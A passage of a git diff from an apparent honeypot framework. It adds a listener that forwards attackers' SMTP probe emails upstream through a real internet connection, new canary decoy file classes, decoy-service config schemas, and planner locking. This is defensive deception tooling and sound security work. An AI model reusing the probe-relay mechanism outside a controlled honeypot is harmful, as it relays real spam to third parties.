- if mtime is not None: - ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC") - touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}" - else: - touch_cmd = f"touch {shlex.quote(path)}" - sh_cmd = ( - f"mkdir -p {shlex.quote(_dirname(path))} && " - f"base64 -d > {shlex.quote(path)} && " - f"chmod {mode:o} {shlex.quote(path)} && " - f"{touch_cmd}" + success, error = await write_file_to_container( + container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT, ) - argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd] - rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii")) - success = rc == 0 payload: dict[str, Any] = { "dst_decky": decky_name, "path": path, "bytes": len(content), - "rc": rc, - "stderr": stderr.strip()[:256] if not success else None, + "rc": 0 if success else 1, + "stderr": error if not success else None, } return ActivityResult(success=success, payload=payload) @@ -283,11 +268,3 @@ class SSHDriver(ActivityDriver): ) -def _dirname(path: str) -> str: - """Pure-string dirname. 
We can't trust ``os.path.dirname`` on the - host to share the destination container's separator semantics, but - deckies are POSIX so a plain ``rfind('/')`` suffices.""" - idx = path.rfind("/") - if idx <= 0: - return "/" - return path[:idx] diff --git a/decnet/orchestrator/emailgen/scheduler.py b/decnet/orchestrator/emailgen/scheduler.py index a1f80214..51d0f735 100644 --- a/decnet/orchestrator/emailgen/scheduler.py +++ b/decnet/orchestrator/emailgen/scheduler.py @@ -175,7 +175,7 @@ async def pick( ) return None - active = [p for p in personas if in_active_hours(p, now_dt.hour)] + active = [p for p in personas if in_active_hours(p, now_dt)] if len(active) < 2: logger.debug( "emailgen pick: source=%s mail_decky=%s only %d personas in-hours", diff --git a/decnet/orchestrator/worker.py b/decnet/orchestrator/worker.py index 66da3c39..3dd9a8d4 100644 --- a/decnet/orchestrator/worker.py +++ b/decnet/orchestrator/worker.py @@ -25,6 +25,7 @@ import secrets from datetime import datetime, timezone from typing import Any, Optional +from decnet.bus import topics as _topics from decnet.bus.factory import get_bus from decnet.bus.publish import ( publish_safely, @@ -34,6 +35,7 @@ from decnet.bus.publish import ( from decnet.logging import get_logger from decnet.orchestrator import events, scheduler from decnet.orchestrator.drivers import get_driver_for +from decnet.orchestrator.drivers.smtp_relay import forward_probe from decnet.orchestrator.emailgen import ( events as email_events, scheduler as email_scheduler, @@ -138,6 +140,9 @@ async def orchestrator_worker( control_task = asyncio.create_task( run_control_listener(bus, "orchestrator", shutdown), ) + probe_task = asyncio.create_task( + _run_smtp_probe_listener(repo, shutdown), + ) tick_n = 0 try: while not shutdown.is_set(): @@ -157,7 +162,7 @@ async def orchestrator_worker( if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0: await _refresh_realism_config(repo) finally: - for t in (heartbeat_task, control_task): + for t in 
(heartbeat_task, control_task, probe_task): t.cancel() with contextlib.suppress(Exception, asyncio.CancelledError): await t @@ -467,6 +472,100 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None: await repo.update_synthetic_file(action.synthetic_file_uuid, patch) +async def _run_smtp_probe_listener( + repo: BaseRepository, + shutdown: asyncio.Event, +) -> None: + """Subscribe to smtp.probe.pending and forward probe emails upstream. + + Runs as a long-lived subtask alongside the tick loop. When a probe lands + we check if this (attacker_ip, decky) has already been forwarded up to + probe_limit times — if not, forward via the master's real internet + connection and store a probe_relay bounty with the result. + """ + try: + bus = get_bus(client_name="orchestrator-probe") + await bus.connect() + sub = bus.subscribe(_topics.smtp("probe.pending")) + async with sub: + async for event in sub: + if shutdown.is_set(): + break + try: + await _handle_probe_pending(repo, event.payload) + except Exception as exc: # noqa: BLE001 + logger.warning("smtp probe listener: handle error: %s", exc) + except asyncio.CancelledError: + raise + except Exception as exc: # noqa: BLE001 + logger.warning("smtp probe listener: bus unavailable: %s", exc) + finally: + with contextlib.suppress(Exception): + await bus.close() + + +async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None: + decky_name = (payload.get("decky") or "").strip() + attacker_ip = (payload.get("attacker_ip") or "").strip() + stored_as = (payload.get("stored_as") or "").strip() + mail_from = (payload.get("mail_from") or "").strip() + rcpt_to_raw = (payload.get("rcpt_to") or "").strip() + + if not (decky_name and attacker_ip and stored_as): + return + + decky_row = await repo.get_fleet_decky_by_name(decky_name) + if not decky_row: + return + svc_cfg = ( + (decky_row.get("decky_config") or {}) + .get("service_config", {}) + .get("smtp_relay") or {} + ) + if not 
(svc_cfg.get("upstream_host") or "").strip(): + return + + probe_limit = int(svc_cfg.get("probe_limit") or 1) + already_sent = await repo.count_probe_relays(attacker_ip, decky_name) + if already_sent >= probe_limit: + return + + rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()] + artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts") + + loop = asyncio.get_event_loop() + ok, reason = await loop.run_in_executor( + None, + lambda: forward_probe( + svc_cfg=svc_cfg, + stored_as=stored_as, + decky_name=decky_name, + mail_from=mail_from, + rcpt_to=rcpt_to, + artifacts_root=artifacts_root, + ), + ) + + await repo.add_bounty({ + "decky": decky_name, + "service": "smtp_relay", + "attacker_ip": attacker_ip, + "bounty_type": "probe_relay", + "payload": { + "stored_as": stored_as, + "forwarded": ok, + **({"fwd_error": reason} if not ok else {}), + }, + }) + if ok: + logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip) + else: + logger.warning( + "smtp probe forward failed decky=%s ip=%s error=%s", + decky_name, attacker_ip, reason, + ) + + async def _record_synthetic_file(repo, action) -> None: """Persist (or patch) a synthetic_files row after a FileAction plant. 
diff --git a/decnet/realism/bodies.py b/decnet/realism/bodies.py index 415dea4d..a24fb273 100644 --- a/decnet/realism/bodies.py +++ b/decnet/realism/bodies.py @@ -25,11 +25,14 @@ from __future__ import annotations import asyncio import secrets from datetime import datetime, timezone -from typing import Callable, Optional +from typing import TYPE_CHECKING, Callable, Optional from decnet.logging import get_logger from decnet.realism.taxonomy import ContentClass +if TYPE_CHECKING: + from decnet.realism.personas import EmailPersona + log = get_logger("realism.bodies") @@ -205,6 +208,9 @@ _BODIES: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = { ContentClass.LOG_DAEMON: _body_log_daemon, ContentClass.CACHE_TMP: _body_cache_tmp, ContentClass.EMAIL: _body_email, + # All canary classes share one placeholder — content-class discriminant is the + # "what"; the real payload (token slug, DNS hook URL) is injected by the canary + # cultivator. Do not replace with distinct generators without updating cultivator. 
ContentClass.CANARY_AWS_CREDS: _body_canary, ContentClass.CANARY_ENV_FILE: _body_canary, ContentClass.CANARY_GIT_CONFIG: _body_canary, @@ -213,6 +219,8 @@ _BODIES: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = { ContentClass.CANARY_HONEYDOC_DOCX: _body_canary, ContentClass.CANARY_HONEYDOC_PDF: _body_canary, ContentClass.CANARY_MYSQL_DUMP: _body_canary, + ContentClass.CANARY_FINGERPRINT_HTML: _body_canary, + ContentClass.CANARY_FINGERPRINT_SVG: _body_canary, } @@ -240,7 +248,7 @@ def make_body( async def make_body_with_llm( content_class: ContentClass, - persona, # EmailPersona — typed loosely to avoid an import cycle + persona: "EmailPersona", *, llm=None, # LLMBackend | None breaker=None, # LLMCircuitBreaker | None diff --git a/decnet/realism/diurnal.py b/decnet/realism/diurnal.py index dc1a2080..f555234e 100644 --- a/decnet/realism/diurnal.py +++ b/decnet/realism/diurnal.py @@ -38,7 +38,7 @@ def _parse_window(window: str) -> tuple[int, int, int, int] | None: Returns ``None`` for malformed input — callers treat that as "always-on" so a single config typo never silences the whole fleet - (mirrors :func:`decnet.realism.personas.in_active_hours` semantics). + (:func:`decnet.realism.personas.in_active_hours` delegates here). 
""" try: start_s, end_s = window.split("-") diff --git a/decnet/realism/llm/impl/fake.py b/decnet/realism/llm/impl/fake.py index d59dba51..120bbd22 100644 --- a/decnet/realism/llm/impl/fake.py +++ b/decnet/realism/llm/impl/fake.py @@ -38,7 +38,7 @@ class FakeBackend(LLMBackend): ) self._success = success - async def generate(self, prompt: str) -> LLMResult: # noqa: ARG002 + async def generate(self, _prompt: str) -> LLMResult: t0 = time.monotonic() latency_ms = int((time.monotonic() - t0) * 1000) return LLMResult( diff --git a/decnet/realism/naming.py b/decnet/realism/naming.py index e6c9dfae..b54ead8c 100644 --- a/decnet/realism/naming.py +++ b/decnet/realism/naming.py @@ -159,6 +159,8 @@ _NAMERS: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = { ContentClass.CANARY_HONEYDOC_DOCX: _name_canary, ContentClass.CANARY_HONEYDOC_PDF: _name_canary, ContentClass.CANARY_MYSQL_DUMP: _name_canary, + ContentClass.CANARY_FINGERPRINT_HTML: _name_canary, + ContentClass.CANARY_FINGERPRINT_SVG: _name_canary, } diff --git a/decnet/realism/personas.py b/decnet/realism/personas.py index adc43da4..ff15abcf 100644 --- a/decnet/realism/personas.py +++ b/decnet/realism/personas.py @@ -19,11 +19,13 @@ not stall the entire realism tick. from __future__ import annotations import json +from datetime import datetime from typing import Literal, Optional from pydantic import BaseModel, Field, ValidationError, field_validator, model_validator from decnet.logging import get_logger +from decnet.realism.diurnal import in_work_hours logger = get_logger("realism.personas") @@ -132,22 +134,10 @@ def login_for(persona: str) -> str: return "user" -def in_active_hours(persona: EmailPersona, now_hour: int) -> bool: - """Return True if *now_hour* (0–23) falls in the persona's window. +def in_active_hours(persona: EmailPersona, now: datetime) -> bool: + """Return True if *now* falls in the persona's active-hours window. - Format: ``"HH:MM-HH:MM"``. 
Wrap-around windows (``"22:00-06:00"``) - are supported. Invalid windows treat the persona as always-on so a - config typo never silences the whole fleet. + Delegates to :func:`decnet.realism.diurnal.in_work_hours` so minute + precision is preserved (``"09:30-17:45"`` is honoured correctly). """ - try: - start_s, end_s = persona.active_hours.split("-") - start_h = int(start_s.split(":")[0]) - end_h = int(end_s.split(":")[0]) - except (ValueError, IndexError): - return True - if start_h == end_h: - return True - if start_h < end_h: - return start_h <= now_hour < end_h - # Wrap-around (e.g. 22:00-06:00). - return now_hour >= start_h or now_hour < end_h + return in_work_hours(persona.active_hours, now) diff --git a/decnet/realism/personas_pool.py b/decnet/realism/personas_pool.py index 9c7a29fe..9202c730 100644 --- a/decnet/realism/personas_pool.py +++ b/decnet/realism/personas_pool.py @@ -120,11 +120,19 @@ def load(*, language_default: str = "en") -> list[EmailPersona]: logger.warning("realism global pool: read failed path=%s: %s", path, exc) return [] + # Re-stat after the read so the stored mtime reflects what we actually + # parsed — a file change between the initial stat and read would otherwise + # cache a stale mtime and suppress the next reload. + try: + st2 = path.stat() + except OSError: + st2 = st + parsed = parse_personas(raw, language_default=language_default) with _lock: _cache = parsed _cache_path = path - _cache_mtime = st.st_mtime + _cache_mtime = st2.st_mtime if parsed: logger.info( "realism global pool: loaded %d personas from %s", len(parsed), path, diff --git a/decnet/realism/planner.py b/decnet/realism/planner.py index e1a63a26..87c04429 100644 --- a/decnet/realism/planner.py +++ b/decnet/realism/planner.py @@ -20,6 +20,7 @@ persona outside its window is never considered. 
from __future__ import annotations import secrets +import threading from datetime import datetime from typing import Any, Optional, Sequence @@ -62,6 +63,8 @@ _DEFAULT_CANARY_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = ( (ContentClass.CANARY_HONEYDOC_DOCX, 1), (ContentClass.CANARY_HONEYDOC_PDF, 1), (ContentClass.CANARY_MYSQL_DUMP, 1), + (ContentClass.CANARY_FINGERPRINT_HTML, 1), + (ContentClass.CANARY_FINGERPRINT_SVG, 1), ) _DEFAULT_CANARY_PROBABILITY = 0.03 @@ -72,6 +75,7 @@ _USER_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_USER_CLASS_ _SYSTEM_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_SYSTEM_CLASS_WEIGHTS _CANARY_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_CANARY_CLASS_WEIGHTS _CANARY_PROBABILITY: float = _DEFAULT_CANARY_PROBABILITY +_planner_lock = threading.Lock() def _serialize_weights( @@ -82,12 +86,15 @@ def _serialize_weights( def _parse_weights( raw: Any, allowed: set[ContentClass], -) -> tuple[tuple[ContentClass, int], ...]: +) -> tuple[tuple[tuple[ContentClass, int], ...], list[str]]: """Parse ``[{"content_class": "...", "weight": N}, ...]`` into the - planner's internal tuple shape. Drops entries whose ``content_class`` - isn't in *allowed* (defends against an operator pasting in a canary - class on the user list, which would skew sampling without the - canary-probability gate). + planner's internal tuple shape. + + Returns ``(weights, dropped)`` where *dropped* is the list of + ``content_class`` values that were valid enum members but not in + *allowed* (e.g. a canary class pasted onto the user list). Callers + surface *dropped* in the API response so the operator can see the + entry didn't land without having to re-read the config. Raises ``ValueError`` on structural problems (non-list, non-int weight, negative weight, empty result) so the API can return 400. 
@@ -95,6 +102,7 @@ def _parse_weights( if not isinstance(raw, list): raise ValueError("weights must be a list") out: list[tuple[ContentClass, int]] = [] + dropped: list[str] = [] for entry in raw: if not isinstance(entry, dict): raise ValueError("each weight entry must be an object") @@ -111,18 +119,14 @@ def _parse_weights( except (ValueError, TypeError): raise ValueError(f"unknown content_class: {cls_name!r}") if cls not in allowed: - # Silently drop — a class that doesn't belong on this list - # (e.g. a canary class on the user list) is operator error, - # but we don't want to fail the whole save over one stray - # entry. The roundtrip in current_payload() will show the - # operator their entry didn't land. + dropped.append(cls.value) continue out.append((cls, weight)) if not out: raise ValueError("weights list resolved to zero valid entries") if sum(w for _, w in out) <= 0: raise ValueError("weights must sum to a positive number") - return tuple(out) + return tuple(out), dropped _USER_CLASSES: set[ContentClass] = { @@ -136,6 +140,7 @@ _CANARY_CLASSES: set[ContentClass] = { ContentClass.CANARY_GIT_CONFIG, ContentClass.CANARY_SSH_KEY, ContentClass.CANARY_HONEYDOC, ContentClass.CANARY_HONEYDOC_DOCX, ContentClass.CANARY_HONEYDOC_PDF, ContentClass.CANARY_MYSQL_DUMP, + ContentClass.CANARY_FINGERPRINT_HTML, ContentClass.CANARY_FINGERPRINT_SVG, } @@ -151,15 +156,21 @@ def current_payload() -> dict[str, Any]: } -def apply_payload(payload: dict[str, Any]) -> None: +def apply_payload(payload: dict[str, Any]) -> list[str]: """Override the planner's live globals from a wire payload. Validates structurally and rebinds module-level names atomically per field — partial failures don't leave the planner in a torn state because validation happens before any rebind. + Returns the list of ``content_class`` values that were dropped + because they didn't belong on their target list (e.g. a canary + class on the user list). 
Callers should surface this in the API + response so operators know their entry didn't land. + Unknown fields are ignored (forward-compat); fields not present - leave the corresponding global untouched.""" + leave the corresponding global untouched. + """ global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY @@ -167,37 +178,45 @@ def apply_payload(payload: dict[str, Any]) -> None: new_system = _SYSTEM_CLASS_WEIGHTS new_canary = _CANARY_CLASS_WEIGHTS new_prob = _CANARY_PROBABILITY + all_dropped: list[str] = [] if "user_class_weights" in payload: - new_user = _parse_weights(payload["user_class_weights"], _USER_CLASSES) + new_user, dropped = _parse_weights(payload["user_class_weights"], _USER_CLASSES) + all_dropped.extend(dropped) if "system_class_weights" in payload: - new_system = _parse_weights( + new_system, dropped = _parse_weights( payload["system_class_weights"], _SYSTEM_CLASSES, ) + all_dropped.extend(dropped) if "canary_class_weights" in payload: - new_canary = _parse_weights( + new_canary, dropped = _parse_weights( payload["canary_class_weights"], _CANARY_CLASSES, ) + all_dropped.extend(dropped) if "canary_probability" in payload: prob = payload["canary_probability"] if not isinstance(prob, (int, float)) or not (0.0 <= prob <= 1.0): raise ValueError("canary_probability must be in [0.0, 1.0]") new_prob = float(prob) - _USER_CLASS_WEIGHTS = new_user - _SYSTEM_CLASS_WEIGHTS = new_system - _CANARY_CLASS_WEIGHTS = new_canary - _CANARY_PROBABILITY = new_prob + with _planner_lock: + _USER_CLASS_WEIGHTS = new_user + _SYSTEM_CLASS_WEIGHTS = new_system + _CANARY_CLASS_WEIGHTS = new_canary + _CANARY_PROBABILITY = new_prob + + return all_dropped def reset_to_defaults() -> None: """Restore hardcoded defaults. 
Used by tests and the API reset path.""" global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY - _USER_CLASS_WEIGHTS = _DEFAULT_USER_CLASS_WEIGHTS - _SYSTEM_CLASS_WEIGHTS = _DEFAULT_SYSTEM_CLASS_WEIGHTS - _CANARY_CLASS_WEIGHTS = _DEFAULT_CANARY_CLASS_WEIGHTS - _CANARY_PROBABILITY = _DEFAULT_CANARY_PROBABILITY + with _planner_lock: + _USER_CLASS_WEIGHTS = _DEFAULT_USER_CLASS_WEIGHTS + _SYSTEM_CLASS_WEIGHTS = _DEFAULT_SYSTEM_CLASS_WEIGHTS + _CANARY_CLASS_WEIGHTS = _DEFAULT_CANARY_CLASS_WEIGHTS + _CANARY_PROBABILITY = _DEFAULT_CANARY_PROBABILITY def _weighted_pick( diff --git a/decnet/realism/taxonomy.py b/decnet/realism/taxonomy.py index 703e4ae0..4ed51612 100644 --- a/decnet/realism/taxonomy.py +++ b/decnet/realism/taxonomy.py @@ -62,6 +62,8 @@ class ContentClass(StrEnum): CANARY_HONEYDOC_DOCX = "canary_honeydoc_docx" CANARY_HONEYDOC_PDF = "canary_honeydoc_pdf" CANARY_MYSQL_DUMP = "canary_mysql_dump" + CANARY_FINGERPRINT_HTML = "canary_fingerprint_html" + CANARY_FINGERPRINT_SVG = "canary_fingerprint_svg" def is_canary(self) -> bool: return self.value.startswith("canary_") diff --git a/decnet/services/base.py b/decnet/services/base.py index 2f7936f0..942813d2 100644 --- a/decnet/services/base.py +++ b/decnet/services/base.py @@ -1,5 +1,47 @@ +import base64 +import binascii from abc import ABC, abstractmethod +from dataclasses import asdict, dataclass from pathlib import Path +from typing import Any, Literal + +# Sentinel prefix used by the deploy wizard to ship multi-line textarea values +# through ConfigParser without relying on its multi-line continuation syntax. +# Plain raw values without the prefix are accepted as-is so direct API +# submitters (PUT /…/services/{svc}/config) keep working with raw strings. 
+TEXTAREA_B64_PREFIX = "b64:" + +FieldType = Literal["string", "password", "int", "bool", "textarea", "enum"] + + +@dataclass(frozen=True) +class ServiceConfigField: + """ + Declarative descriptor for one user-editable knob on a service. + + The Inspector form (Fleet + MazeNET) renders inputs from this metadata, + and BaseService.validate_cfg coerces submitted values against it. + """ + + key: str + label: str + type: FieldType = "string" + default: Any = None + secret: bool = False + help: str | None = None + enum: list[str] | None = None + placeholder: str | None = None + + def to_json(self) -> dict: + d = asdict(self) + # Frontend doesn't need a None enum dangling on non-enum fields + if self.enum is None: + d.pop("enum", None) + return d + + +class ConfigValidationError(ValueError): + """Raised when a submitted service_cfg value cannot be coerced to its declared type.""" class BaseService(ABC): @@ -15,6 +57,10 @@ class BaseService(ABC): default_image: str # Docker image tag, or "build" if a Dockerfile is needed fleet_singleton: bool = False # True = runs once fleet-wide, not per-decky + # Per-service customizable fields exposed to the Inspector UI. + # Subclasses override; default empty -> "No customizable fields". + config_schema: list[ServiceConfigField] = [] + @abstractmethod def compose_fragment( self, @@ -41,3 +87,63 @@ class BaseService(ABC): image built. Return None if default_image is used directly. """ return None + + def validate_cfg(self, cfg: dict | None) -> dict: + """ + Coerce a user-submitted dict against this service's config_schema. + + Unknown keys are silently dropped. Declared keys are coerced to their + declared type (raising ConfigValidationError on bad values). Empty + strings on optional fields drop the key entirely so compose_fragment's + existing `if "X" in cfg` guards keep working. 
+ """ + out: dict[str, Any] = {} + if not cfg: + return out + by_key = {f.key: f for f in self.config_schema} + for key, raw in cfg.items(): + spec = by_key.get(key) + if spec is None: + continue # drop unknown keys + if raw is None or raw == "": + continue + out[key] = _coerce(spec, raw) + return out + + +def _coerce(spec: ServiceConfigField, raw: Any) -> Any: + t = spec.type + if t in ("string", "password"): + return str(raw) + if t == "textarea": + s = str(raw) + if s.startswith(TEXTAREA_B64_PREFIX): + try: + return base64.b64decode(s[len(TEXTAREA_B64_PREFIX):], validate=True).decode("utf-8") + except (binascii.Error, UnicodeDecodeError) as e: + raise ConfigValidationError( + f"{spec.key}: malformed {TEXTAREA_B64_PREFIX} payload" + ) from e + return s + if t == "int": + try: + return int(raw) + except (TypeError, ValueError) as e: + raise ConfigValidationError(f"{spec.key}: expected int, got {raw!r}") from e + if t == "bool": + if isinstance(raw, bool): + return raw + if isinstance(raw, str): + if raw.lower() in ("true", "1", "yes", "on"): + return True + if raw.lower() in ("false", "0", "no", "off"): + return False + raise ConfigValidationError(f"{spec.key}: expected bool, got {raw!r}") + if t == "enum": + s = str(raw) + if spec.enum and s not in spec.enum: + raise ConfigValidationError( + f"{spec.key}: {s!r} not in allowed values {spec.enum}" + ) + return s + raise ConfigValidationError(f"{spec.key}: unknown field type {t!r}") diff --git a/decnet/services/conpot.py b/decnet/services/conpot.py index 5eacff6a..a4750483 100644 --- a/decnet/services/conpot.py +++ b/decnet/services/conpot.py @@ -12,6 +12,7 @@ class ConpotService(BaseService): name = "conpot" ports = [502, 161, 80] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: env = { diff --git a/decnet/services/docker_api.py 
b/decnet/services/docker_api.py index d4db39c4..e58c8e34 100644 --- a/decnet/services/docker_api.py +++ b/decnet/services/docker_api.py @@ -8,6 +8,7 @@ class DockerAPIService(BaseService): name = "docker_api" ports = [2375, 2376] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/elasticsearch.py b/decnet/services/elasticsearch.py index d4bb65c2..b08c9a0d 100644 --- a/decnet/services/elasticsearch.py +++ b/decnet/services/elasticsearch.py @@ -9,6 +9,7 @@ class ElasticsearchService(BaseService): name = "elasticsearch" ports = [9200] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/ftp.py b/decnet/services/ftp.py index 0a1cafe3..d9059aac 100644 --- a/decnet/services/ftp.py +++ b/decnet/services/ftp.py @@ -8,6 +8,7 @@ class FTPService(BaseService): name = "ftp" ports = [21] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/http.py b/decnet/services/http.py index 56928def..7639ed42 100644 --- a/decnet/services/http.py +++ b/decnet/services/http.py @@ -1,6 +1,6 @@ import json from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "http" @@ -10,6 +10,41 @@ class HTTPService(BaseService): ports = [80, 443] default_image = "build" + 
config_schema = [ + ServiceConfigField( + key="server_header", + label="Server header", + type="string", + placeholder="Apache/2.4.41 (Ubuntu)", + help="Value sent in the HTTP Server: response header.", + ), + ServiceConfigField( + key="response_code", + label="Default response code", + type="int", + default=200, + ), + ServiceConfigField( + key="fake_app", + label="Fake application", + type="enum", + enum=["none", "wordpress", "phpmyadmin", "tomcat", "jenkins"], + default="none", + help="Pre-baked application skin to render on the index page.", + ), + ServiceConfigField( + key="extra_headers", + label="Extra headers (JSON or raw)", + type="textarea", + placeholder='{"X-Powered-By": "PHP/7.4.3"}', + ), + ServiceConfigField( + key="custom_body", + label="Custom response body", + type="textarea", + ), + ] + def compose_fragment( self, decky_name: str, diff --git a/decnet/services/https.py b/decnet/services/https.py index 3c6735a9..8faefbb4 100644 --- a/decnet/services/https.py +++ b/decnet/services/https.py @@ -1,6 +1,6 @@ import json from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "https" @@ -10,6 +10,57 @@ class HTTPSService(BaseService): ports = [443] default_image = "build" + config_schema = [ + ServiceConfigField( + key="server_header", + label="Server header", + type="string", + placeholder="nginx/1.18.0", + ), + ServiceConfigField( + key="response_code", + label="Default response code", + type="int", + default=200, + ), + ServiceConfigField( + key="fake_app", + label="Fake application", + type="enum", + enum=["none", "wordpress", "phpmyadmin", "tomcat", "jenkins"], + default="none", + ), + ServiceConfigField( + key="extra_headers", + label="Extra headers (JSON or raw)", + type="textarea", + ), + ServiceConfigField( + key="custom_body", + label="Custom response body", + type="textarea", + ), + ServiceConfigField( 
+ key="tls_cn", + label="TLS certificate CN", + type="string", + placeholder="mail.corp.local", + help="Common Name baked into the self-signed cert if no cert/key provided.", + ), + ServiceConfigField( + key="tls_cert", + label="TLS certificate (PEM)", + type="textarea", + secret=True, + ), + ServiceConfigField( + key="tls_key", + label="TLS private key (PEM)", + type="textarea", + secret=True, + ), + ] + def compose_fragment( self, decky_name: str, diff --git a/decnet/services/imap.py b/decnet/services/imap.py index 902f57cf..86de699d 100644 --- a/decnet/services/imap.py +++ b/decnet/services/imap.py @@ -8,6 +8,7 @@ class IMAPService(BaseService): name = "imap" ports = [143, 993] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/k8s.py b/decnet/services/k8s.py index 32cc56db..47e988fc 100644 --- a/decnet/services/k8s.py +++ b/decnet/services/k8s.py @@ -8,6 +8,7 @@ class KubernetesAPIService(BaseService): name = "k8s" ports = [6443, 8080] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/ldap.py b/decnet/services/ldap.py index 76eaa2d0..6d7337b7 100644 --- a/decnet/services/ldap.py +++ b/decnet/services/ldap.py @@ -8,6 +8,7 @@ class LDAPService(BaseService): name = "ldap" ports = [389, 636] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/llmnr.py b/decnet/services/llmnr.py 
index 43197376..9e4a7b0e 100644 --- a/decnet/services/llmnr.py +++ b/decnet/services/llmnr.py @@ -15,6 +15,7 @@ class LLMNRService(BaseService): name = "llmnr" ports = [5355, 5353] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/mongodb.py b/decnet/services/mongodb.py index 397faaf3..050d10b0 100644 --- a/decnet/services/mongodb.py +++ b/decnet/services/mongodb.py @@ -8,6 +8,7 @@ class MongoDBService(BaseService): name = "mongodb" ports = [27017] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/mqtt.py b/decnet/services/mqtt.py index 60d134f5..b2260b71 100644 --- a/decnet/services/mqtt.py +++ b/decnet/services/mqtt.py @@ -8,6 +8,7 @@ class MQTTService(BaseService): name = "mqtt" ports = [1883] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/mssql.py b/decnet/services/mssql.py index 46b262dc..4b8528e3 100644 --- a/decnet/services/mssql.py +++ b/decnet/services/mssql.py @@ -8,6 +8,7 @@ class MSSQLService(BaseService): name = "mssql" ports = [1433] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/mysql.py b/decnet/services/mysql.py index 
deb5b502..639a2d08 100644 --- a/decnet/services/mysql.py +++ b/decnet/services/mysql.py @@ -1,5 +1,5 @@ from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "mysql" @@ -9,6 +9,16 @@ class MySQLService(BaseService): ports = [3306] default_image = "build" + config_schema = [ + ServiceConfigField( + key="version", + label="Advertised MySQL version", + type="string", + placeholder="8.0.36", + help="Sets the version banner the fake MySQL handshake reports.", + ), + ] + def compose_fragment( self, decky_name: str, diff --git a/decnet/services/pop3.py b/decnet/services/pop3.py index 58e33ad1..6fd57a38 100644 --- a/decnet/services/pop3.py +++ b/decnet/services/pop3.py @@ -8,6 +8,7 @@ class POP3Service(BaseService): name = "pop3" ports = [110, 995] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/postgres.py b/decnet/services/postgres.py index 8a75ded0..62bf83df 100644 --- a/decnet/services/postgres.py +++ b/decnet/services/postgres.py @@ -8,6 +8,7 @@ class PostgresService(BaseService): name = "postgres" ports = [5432] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/rdp.py b/decnet/services/rdp.py index 